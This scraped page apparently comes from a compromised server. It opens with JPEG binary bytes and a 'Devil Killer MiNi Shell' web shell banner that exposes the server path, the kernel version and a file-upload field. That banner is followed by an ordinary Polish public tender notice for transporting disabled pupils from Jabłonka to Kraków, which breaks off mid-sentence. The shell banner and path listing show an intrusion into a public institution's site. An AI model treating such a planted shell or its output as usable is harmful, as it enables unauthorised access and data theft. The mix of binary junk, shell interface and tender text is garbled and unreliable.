JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250723/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250723/0034009701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów niepełnosprawnych z terenu Gminy Jabłonka do szkoły w Krakowie w roku szkolnym 2025/2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Wspólnych w Jabłonce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 492902313</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3-go Maja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jabłonka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">182611130</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">biuro@cuwjablonka.pl</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@cuwjablonka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cuwjablonka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> obsługa administracyjna, finansowa i organizacyjna obsługiwanych jednostek oświatowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów niepełnosprawnych z terenu Gminy Jabłonka do szkoły w Krakowie w roku szkolnym 2025/2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1fcdbc9e-8cf6-45cb-b9b4-b5b3a63b2954</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00340097</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00082576/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz uczniów niepełnosprawnych z terenu Gminy Jabłonka oraz z terenu Gminy Lipnica Wielka w roku szkolnym 2025/2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1fcdbc9e-8cf6-45cb-b9b4-b5b3a63b2954 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/> Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/> https://ezamowienia.gov.pl.<br/> 2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/> 4. Adres strony internetowej prowadzonego postępowania (link prowadzący<br/> bezpośrednio do widoku postępowania na Platformie e-Zamówienia):<br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1fcdbc9e-8cf6-45cb-b9b4-b5b3a63b2954<br/> Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia<br/> (przycisk „Przeglądaj postępowania/konkursy”).<br/> 5. Identyfikator (ID) postępowania na Platformie e-Zamówienia:<br/> ocds-148610-1fcdbc9e-8cf6-45cb-b9b4-b5b3a63b2954</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/> zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/> jest dostępna pod adresem https://ezamowienia.gov.pl.<br/> 2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/> 4. Adres strony internetowej prowadzonego postępowania (link prowadzący<br/> bezpośrednio do widoku postępowania na Platformie e-Zamówienia):<br/> https://ezamowienia.gov.pl/mp-client/search/list/ ocds-148610-1fcdbc9e-8cf6-45cb-b9b4-b5b3a63b2954<br/> Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia<br/> (przycisk „Przeglądaj postępowania/konkursy”).<br/> 5. Identyfikator (ID) postępowania na Platformie e-Zamówienia:<br/> ocds-148610-1fcdbc9e-8cf6-45cb-b9b4-b5b3a63b2954<br/> 6. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/> zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/> Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/> 7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/> dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/> rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i<br/> przekazuje się jako załączniki.<br/> W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/> 8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/> wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/> a. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/> przekazuje się jako załącznik), lub<br/> b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/> wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/> 9. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/> drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/> komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/> zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/> wiadomości (przycisk „dodaj załącznik”).<br/> 10. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/> „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/> komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/> uproszczonego na Platformie e-Zamówienia.<br/> 11. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/> postępowania w zakładce „Komunikacja”.<br/> 12. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/> plików przesyłanych jako załączniki do jednego formularza).<br/> 13. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/> informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/> 14. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/> Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/> biuro@cuwjablonka.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">administratorem Pani/Pana danych osobowych jest Dyrektor Centrum Usług Wspólnych w<br/> Jabłonce, ul. 3 – go Maja 1, 34 – 480 Jabłonka;<br/> • Kontakt z inspektorem ochrony danych osobowych w Centrum Usług Wspólnych kontakt: e-mail: iod_cuw@jablonka.pl, telefon<br/> 18/2611153;<br/> • Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/> udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/ prowadzonym w trybie przetargu<br/> nieograniczonego nr CUW.26.7.2025 „Dowóz uczniów niepełnosprawnych z terenu Gminy Jabłonka do szkoły w Krakowie w roku szkolnym 2025/2026”.<br/> • odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/> w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późn.<br/> zm.), dalej „ustawa Pzp”;<br/> • dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/> postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres<br/> obowiązywania umowy lub dłuższym, jeżeli wynika to z odrębnych przepisów; Okresy te dotyczą również Wykonawców, którzy<br/> złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).<br/> • obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/> określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/> niepodania określonych danych wynikają z ustawy Pzp;<br/> • w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/> RODO;<br/> • posiada Pani/Pan:- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/> przypadków, o których mowa w art. 18 ust. 2 RODO;- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/> osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/> − w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> − na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/> Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.26.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest „Dowóz uczniów z terenu Gminy Jabłonka do Specjalnego Ośrodka Szkolno-Wychowawczego dla Niesłyszących im. Janusza Korczaka w Kra-kowie w roku szkolnym 2025/2026”.<br/>2. Zakres rzeczowy zamówienia obejmuje wykonanie przewozu uczniów na trasie:<br/>2.1. Wykaz przystanków<br/>a)	Lipnica Mała 181C<br/>b)	Specjalny Ośrodek Szkolno-Wychowawczy dla Niesłyszących im. Janusza Kor-czaka, ul. Grochowa 19, 30 – 731 Kraków <br/>c) do wykonania 2 kursy tygodniowo ( 1 – w Poniedziałek, 1 – w piątek)<br/>d) 1 kurs około 100 km, szacunkowa ilość kilometrów dowozów 100 x 76 = 7600 km od dnia 1 września 2025 do dnia zakończenia zajęć szkolnych w roku 2026, tj. 26.06.2026 r.– 76 dni (38 tygodni)<br/>Usługi przewozowe należy wykonywać zgodnie z ustalonym harmonogramem dosto-sowanym do planu nauczania danej placówki oświatowej. Zapewnienie opieki w cza-sie dowozu dla ucznia jest po stronie Wykonawcy.<br/><br/>3.	Dni dowozów w roku szkolnym 2025/2026 w okresie od 1 września 2025 roku do 26 czerwca 2026 roku – 76 dni przy czym gwarantowana ilość dni w których bę-dzie świadczona usługa dowozu/odwozu, wynosi 30 dni <br/>4.	Tygodniową liczbę przejechanych kilometrów w ramach wykonywania przed-miotu zamówienia ustala się na około 200 km na trasie do Lipnica Mała – Kraków. Liczba kilometrów, o której mowa wyżej może ulec zmianie ze względu na zmianę przebiegu trasy w przypadku zgłoszenia (bądź rezygnacji) przez rodziców/opiekunów prawnych dzieci do dowozu.<br/>5.	Długości tras przewozu liczone są od przystanków początkowych. Koszty do-jazdu Wykonawcy do miejsca rozpoczęcia trasy i zjazdu po zakończeniu dowozu nie mogą obciążać Zamawiającego. <br/>6.	W przypadku wystąpienia silnych opadów śniegu lub innych zjawisk atmosfe-rycznych uniemożliwiających dojazd, w porozumieniu z Zamawiającym oraz Dyrekto-rem szkoły mogą nastąpić przesunięcia godzin dowozu i odwozu dzieci.<br/>7.	W przypadku remontów, awarii, uszkodzeń mostów, dróg lub innych obiektów czego skutkiem będzie zmiana lub konieczność zmiany trasy przewozowych (w tym także wydłużenie trasy lub skrócenie trasy ze względu na zmianę ilości dowożonych dzieci), Zamawiający dopuszcza możliwość zmiany umowy i należnego (tak zwiększe-nia jak i zmniejszenia) wynagrodzenia na podstawie ceny ofertowej Wykonawcy za 1 km.<br/>8.	Podana liczba uczniów ma charakter orientacyjny i może ulec zmianie w trak-cie realizacji zamówienia (może ulec zwiększeniu lub zmniejszeniu). <br/>9.	Opcja zwiększenia ilości dowożonych dzieci będzie miała zastosowanie w przypadku zgłoszenia przez rodziców/opiekunów prawnych nowych dzieci do dowo-zu. <br/>10.	Wykonawca zobowiązany jest wielkość pojazdu dostosować do uwarunkowań przedmiotowej usługi.<br/>11.	Cena oferty powinna uwzględniać koszt dojazdu do miejsca rozpoczęcia wyko-nywania usługi.<br/>12.	Wskazano przystanki najdalsze – dzieci zabierane są na odcinkach pomiędzy przystankami.<br/>13.	Wykonawca zobowiązany jest świadczyć usługi w taki sposób, aby czas prze-bywania uczniów w podróży był jak najkrótszy, a nadto winien uwzględnić to, aby przewożeniu uczniowie mogli punktualnie rozpocząć zajęcia lekcyjne i bez zbędnego oczekiwania na nie, a nadto aby po ich zakończeniu byli odwożeni bez zbędnego oczekiwania. Usługi przewozowe będą odbywać się najkrótszą trasą z domu do szkoły i po skończonych zajęciach lekcyjnych ze szkoły do domu.<br/>14.	Świadczenie usług przewozowych polegających na dowozie dzieci i młodzieży niepełnosprawnej musi być wykonywane pojazdami specjalistycznymi dostosowa-nymi do przewozu osób niepełnosprawnych, w tym osób na wózkach inwalidzkich. Dostosowanie pojazdów do przewozu osób niepełnosprawnych oraz ich oznaczenie musi być zgodnie z obowiązującymi w tym zakresie przepisami prawnymi. Pojazdy, którymi przewożone będą dzieci muszą być w pełni sprawne technicznie, dostosowa-ne do ilości przewożonych dzieci i posiadającymi świadectwo dopuszczenia do ruchu – wydane zgodnie z Prawem o ruchu drogowym. Pojazdy mają być oznaczone zgod-nie z obowiązującym Rozporządzeniem w sprawie rejestracji i oznaczania pojazdów oraz wymagań dla tablic rejestracyjnych (Dz.U. z 2017 r., poz. 2355 z późn. zm.). Każdy pojazd ma posiadać ubezpieczenie OC i NNW, ma być utrzymany w czystości, sprawny technicznie. W zimie każdy pojazd ma być ogrzewany, odśnieżony, a wejścia do niego oczyszczone z ewentualnego oblodzenia, tak by były one bezpieczne.<br/>15.	W przypadku wystąpienia awarii pojazdu lub w przypadku stwierdzenia przez Zamawiającego lub policję niesprawności pojazdu, która zagraża bezpieczeństwu osób przewożonych Wykonawca zobowiązany jest do niezwłocznego podstawienia pojazdu zastępczego do dalszej realizacji zamówienia. Pojazd zastępczy winien być podstawiony w czasie zgodnym z czasem podanym przez Wykonawcę w ofercie przetargowej. W przypadku przekroczenia tego terminu Wykonawcy zostaną naliczo-ne kary umowne za nie przestrzeganie warunków umowy. <br/>16.	Wykonawca zobowiązany jest posiadać w gotowości pojazd zastępczy, który może zostać użyty w przypadku wystąpienia awarii innego pojazdu, którym świad-czona jest usługa dowozu. <br/>17.	Wykonawcy ponoszą wyłączną odpowiedzialność za zapoznanie się z należytą starannością z treścią specyfikacji istotnych warunków zamówienia dostępną na stro-nie internetowej Zamawiającego. <br/>18.	Przewóz uczniów do placówek szkolnych odbywać się będzie w dni nauki szkolnej, w oparciu o Rozporządzenie Ministra Edukacji Narodowej i Sportu z 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz. U. Nr 46, poz. 432 z 2002 r. z późn. zm.) z wyłączeniem przerw świątecznych i innych dni wolnych od zajęć wy-nikających z organizacji roku szkolnego. Wykonawca zobowiązany będzie zapewnić transport również w dni, w które uczniowie będą odrabiali inne dni zwolnione z nauki szkolnej. <br/>19.	Dowóz będzie się odbywał w dni robocze wynikające z zajęć szkolnych <br/>20.	Dowóz nie będzie realizowany w czasie ferii. Zaś w dni wolne od zajęć dydak-tycznych dowóz będzie organizowany na życzenie rodziców (np. sprawdzianów, eg-zaminów oraz w inne dodatkowe wolne dni od zajęć szkolnych, itp.).<br/>21.	CPV<br/>przedmiot główny: <br/>60100000-9 - Usługi w zakresie transportu drogowego <br/>przedmioty dodatkowe: <br/>60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2026-06-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się<br/> następującymi kryteriami:<br/> a) Kryterium „cena” (Kc) – 60 pkt<br/> b) Kryterium „czas podstawienia pojazdu zastępczego” (Kpz) – 40 pk</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz 